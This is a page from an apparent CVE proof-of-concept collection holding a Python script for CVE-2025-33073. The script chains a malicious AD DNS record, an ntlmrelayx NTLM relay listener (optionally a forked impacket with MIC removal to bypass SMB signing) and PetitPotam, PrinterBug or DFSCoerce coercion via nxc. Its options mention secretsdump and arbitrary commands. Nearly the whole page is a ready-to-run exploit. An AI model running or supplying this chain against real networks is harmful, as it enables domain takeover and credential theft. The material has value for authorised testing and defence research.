4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-33073.py PY
#!/usr/bin/env python3
import sys
import os
import argparse
import subprocess
import time
from pathlib import Path

# Check if we're in a virtual environment, if not try to use local venv
def ensure_venv():
    script_dir = Path(__file__).parent.absolute()
    venv_dir = script_dir / "venv"
    venv_site_packages = venv_dir / "lib" / "python3" / "site-packages"
    venv_python = venv_dir / "bin" / "python3"
    
    # Check if we're already in a venv
    in_venv = (hasattr(sys, 'real_prefix') or 
               (hasattr(sys, 'base_prefix') and sys.base_prefix != sys.prefix))
    
    # If not in venv but local venv exists, add it to path
    if not in_venv and venv_site_packages.exists():
        # Find the actual python version directory
        for py_dir in venv_dir.glob("lib/python3.*"):
            site_packages = py_dir / "site-packages"
            if site_packages.exists():
                if str(site_packages) not in sys.path:
                    sys.path.insert(0, str(site_packages))
                break
    
    # Check if required packages are available
    try:
        import ldap3
    except ImportError:
        print("[!] Required packages not found.")
        if venv_dir.exists():
            print("[!] Virtual environment exists but packages may not be installed.")
            print("[!] Please run:")
            print(f"    source {venv_dir}/bin/activate")
            print(f"    pip install -r requirements.txt")
        else:
            print("[!] Please run the setup script first:")
            print(f"    ./setup.sh")
        print("")
        sys.exit(1)
    
    # Return the Python executable to use (venv's Python if available, otherwise sys.executable)
    if venv_python.exists():
        return str(venv_python)
    return sys.executable

# Ensure venv packages are available before importing other modules
VENV_PYTHON = ensure_venv()

STATIC_DNS_RECORD = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

def ensure_forked_impacket():
    """Check if forked impacket is available, install if not."""
    script_dir = Path(__file__).parent.absolute()
    venv_dir = script_dir / "venv"
    venv_python = venv_dir / "bin" / "python3"
    
    if not venv_python.exists():
        print("[!] Virtual environment not found. Please run ./setup.sh first.")
        sys.exit(1)
    
    # Check if forked version is available by checking for remove_mic_partial in help
    try:
        result = subprocess.run(
            [str(venv_python), "ntlmrelayx.py", "--help"],
            capture_output=True,
            text=True,
            timeout=5
        )
        if result.returncode == 0 and "--remove-mic-partial" in result.stdout:
            return True
    except:
        pass
    
    # Forked version not available, install it
    print("[*] Forked impacket version not found. Installing...")
    try:
        result = subprocess.run(
            [str(venv_python), "-m", "pip", "install", "--upgrade", "git+https://github.com/decoder-it/impacket-partial-mic.git#egg=impacket"],
            check=True,
            capture_output=True,
            text=True
        )
        print("[+] Forked impacket version installed successfully.")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[!] Failed to install forked impacket version.")
        if e.stderr:
            print(f"[!] Error: {e.stderr}")
        print("[!] Please install manually: pip install git+https://github.com/decoder-it/impacket-partial-mic.git#egg=impacket")
        return False

def run_dnstool(user, password, attacker_ip, dns_ip, dc_fqdn):
    print("[*] Adding malicious DNS record using dnstool.py...")
    script_dir = Path(__file__).parent.absolute()
    dnstool_path = script_dir / "dnstool.py"
    dnstool_cmd = [
        sys.executable, str(dnstool_path),
        "-u", user,
        "-p", password,
        "-a", "add",
        "-r", STATIC_DNS_RECORD,
        "-d", attacker_ip,
        "-dns-ip", dns_ip,
        dc_fqdn
    ]
    subprocess.run(dnstool_cmd, check=True)
    print("[+] DNS record added.")

def wait_for_dns_record(record, dns_ip, timeout=60):
    timeout = int(timeout)
    print(f"[*] Waiting for DNS record {record} to propagate...")
    start_time = time.time()
    while time.time() - start_time < timeout:
        try:
            result = subprocess.run(
                ["dig", "+short", record, f"@{dns_ip}"],
                capture_output=True, text=True
            )
            if result.stdout.strip():
                print("[+] DNS record is live.")
                return True
        except Exception as e:
            print(f"[!] Error checking DNS record: {e}")
        time.sleep(2)
    print("[!] Timeout reached. DNS record not found.")
    return False

def start_ntlmrelayx(target, custom_command=None, socks=False, smb_signing=False, dc_ip=None, dc_fqdn=None, dns_ip=None):
    if smb_signing:
        # Ensure forked impacket is available
        if not ensure_forked_impacket():
            print("[!] Cannot proceed without forked impacket version.")
            sys.exit(1)
        
        print("[*] Starting ntlmrelayx.py listener with --remove-mic-partial in this terminal...")
        # Determine LDAPS target: prefer dc_ip, then dc_fqdn, then dns_ip (commonly the DC)
        if dc_ip:
            ldaps_target = dc_ip
        elif dc_fqdn:
            ldaps_target = dc_fqdn
        elif dns_ip:
            ldaps_target = dns_ip
        # Format target as ldaps://FQDNDCorIP
        if not ldaps_target.startswith("ldaps://"):
            ldaps_target = f"ldaps://{ldaps_target}"
        # Use ntlmrelayx.py directly (available in venv PATH)
        cmd = ["ntlmrelayx.py", "-t", ldaps_target, "--no-multirelay", "-i", "-smb2support", "--remove-mic-partial", "--keep-relaying"]
    else:
        print("[*] Starting ntlmrelayx listener in this terminal...")
        # Use standard system impacket-ntlmrelayx
        cmd = ["impacket-ntlmrelayx", "-t", target, "-smb2support"]
        if custom_command:
            cmd.extend(["-c", custom_command])
        if socks:
            cmd.append("-socks")
    return subprocess.Popen(cmd)

def run_petitpotam(target_ip, domain, user, password, method="PetitPotam"):
    print(f"[*] Triggering {method} coercion via nxc...")

    command_str = (
        f"nxc smb {target_ip} "
        f"-d {domain} "
        f"-u {user} "
        f"-p '{password}' "
        f"-M coerce_plus "
        f"-o M={method} L=\"{STATIC_DNS_RECORD}\""
    )

    print(f"[*] Running {method} silently in this terminal...")
    subprocess.Popen(
        command_str, 
        shell=True,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL
    )

def main():
    parser = argparse.ArgumentParser(description="Ethical attack chain: dnstool + ntlmrelayx + coercion method")
    parser.add_argument("-u", "--username", required=True, help="Username (DOMAIN\\user)")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-d", "--attacker-ip", required=True, help="Attacker IP (Linux/Kali machine)")
    parser.add_argument("--dns-ip", required=True, help="IP of Domain Controller (DNS)")
    parser.add_argument("--dc-fqdn", help="FQDN of the Domain Controller")
    parser.add_argument("--dc-ip", help="IP of the Domain Controller (alternative to --dc-fqdn)")
    parser.add_argument("--target", required=True, help="Target machine for NTLM relay (FQDN)")
    parser.add_argument("--target-ip", required=True, help="IP of the coercion target (for nxc)")
    parser.add_argument("--custom-command", help="Run custom command instead of secretsdump")
    parser.add_argument("--socks", action="store_true", help="Enable SOCKS proxy in ntlmrelayx")
    parser.add_argument("--smb-signing", action="store_true", help="Use ntlmrelayx.py with --remove-mic-partial for SMB signing bypass")
    parser.add_argument("-M", "--method", default="PetitPotam", 
                        choices=["PetitPotam", "Printerbug", "DFSCoerce"],
                        help="Coercion method to use (default: PetitPotam)")
    args = parser.parse_args()

    # Validate that either --dc-fqdn or --dc-ip is provided
    if not args.dc_fqdn and not args.dc_ip:
        parser.error("Either --dc-fqdn or --dc-ip must be provided")
    
    # Determine DC identifier for DNS operations (prefer FQDN, fallback to IP)
    dc_identifier = args.dc_fqdn if args.dc_fqdn else args.dc_ip

    # Step 1: Add DNS record (static record inside)
    run_dnstool(args.username, args.password, args.attacker_ip, args.dns_ip, dc_identifier)

    # Step 2: Check if DNS record was added succesfully
    # Extract domain name from FQDN if available
    if args.dc_fqdn:
        domain_name = ".".join(args.dc_fqdn.split(".")[1:])
    else:
        # If only IP provided, try to extract domain from username
        # Username format is DOMAIN\user, where DOMAIN might be NetBIOS name
        # Common convention: NetBIOS name.lower() + ".local" = DNS domain
        if "\\" in args.username:
            netbios_domain = args.username.split("\\")[0].lower()
            # Try common domain formats
            domain_name = f"{netbios_domain}"
            print(f"[*] Warning: Using inferred domain '{domain_name}' from username. If incorrect, please provide --dc-fqdn.")
        else:
            domain_name = "local"
            print(f"[*] Warning: Could not determine domain name. Using '{domain_name}' as fallback. Please provide --dc-fqdn for accurate DNS operations.")
    full_record = f"{STATIC_DNS_RECORD}.{domain_name}"
    if not wait_for_dns_record(full_record, args.dns_ip, timeout=60):
        print("[!] Exiting due to DNS record not being live.")
        sys.exit(1)
    
    # Step 3: Start ntlmrelayx listener
    ntlmrelay_proc = start_ntlmrelayx(args.target, args.custom_command, args.socks, args.smb_signing, args.dc_ip, args.dc_fqdn, args.dns_ip)
    time.sleep(5)  # Give ntlmrelayx some time to start

    # Step 4: Trigger coercion method
    domain, user = args.username.split("\\", 1)
    run_petitpotam(args.target_ip, domain, user, args.password, args.method)

    print("[*] Exploit chain triggered.")
    print("[*] Check this terminal for output.")
    try:
        ntlmrelay_proc.wait()
    except KeyboardInterrupt:
        print("\n[*] Keyboard interrupt received. Stopping...")
        ntlmrelay_proc.terminate()

if __name__ == "__main__":
    main()